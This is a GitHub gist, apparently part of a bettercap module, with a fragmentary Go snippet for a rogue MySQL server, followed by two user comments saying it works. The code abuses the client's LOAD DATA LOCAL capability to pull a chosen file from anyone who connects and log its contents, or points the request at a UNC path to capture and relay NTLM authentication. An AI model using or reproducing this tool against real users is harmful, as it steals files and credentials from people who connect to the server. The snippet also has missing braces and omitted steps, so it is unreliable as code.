Skip to content

Instantly share code, notes, and snippets.

Last active May 4, 2020 19:37
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save bmaia/adc503231ffff19a77aaf0c7abd2e895 to your computer and use it in GitHub Desktop.
for mysql.Running() {
// tcp listener
conn, err := mysql.listener.AcceptTCP()
if err != nil {
log.Warning("Error while accepting TCP connection: %s", err)
// send the mysql greeting
// read the incoming responses and retrieve infile
// TODO: include binary support and files > 16kb
b := make([]byte, 16384)
// parse client capabilities and validate connection
// TODO: parse mysql connections properly and
// display additional connection attributes
clientCapabilities := fmt.Sprintf("%08b", (int(uint32(b[4]) | uint32(b[5])<<8)))
if len(clientCapabilities) == 16 {
remoteAddress := strings.Split(conn.RemoteAddr().String(), ":")[0]
log.Info("MySQL connection from: %s", remoteAddress)
loadData := string(clientCapabilities[8])
log.Info("Can Use LOAD DATA LOCAL: %s", loadData)
username := bytes.Split(b[36:], []byte{0})[0]
log.Info("MySQL Login Request Username: %s", username)
// send initial responseOK
infileLen, err := bufio.NewReader(conn).Read(b)
if err != nil {
log.Warning("Error while reading buffer: %s", err)
// check if the infile is an UNC path
if strings.HasPrefix(mysql.infile, "\\") {
log.Info("NTLM from '%s' relayed to %s", remoteAddress, mysql.infile)
} else {
// print the infile content, ignore mysql protocol headers
// TODO: include binary support and output to a file
log.Info("Retrieving '%s' from %s (%d bytes)\n%s", mysql.infile, remoteAddress, infileLen-9, string(b)[4:infileLen-4])
// send additional response
defer conn.Close()
Copy link

guanicoe commented May 4, 2020

ok i'll give it a try. I did first try but it spat a lot of exceptions and reading your post I thought I'd give bettercap a try as everything was integrated

error: uncaptured python exception, closing channel <__main__.http_request_handler connected at 0x7fcd7c36f050> (<type 'exceptions.ValueError'>: [/usr/lib/python2.7/|read|83] [/usr/lib/python2.7/|handle_read_event|449] [/usr/lib/python2.7/|handle_read|147] [|found_terminator|184])

Copy link

guanicoe commented May 4, 2020

Just to let you know that your module works great, and that i was to blame.The error came from a malformed sql query

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment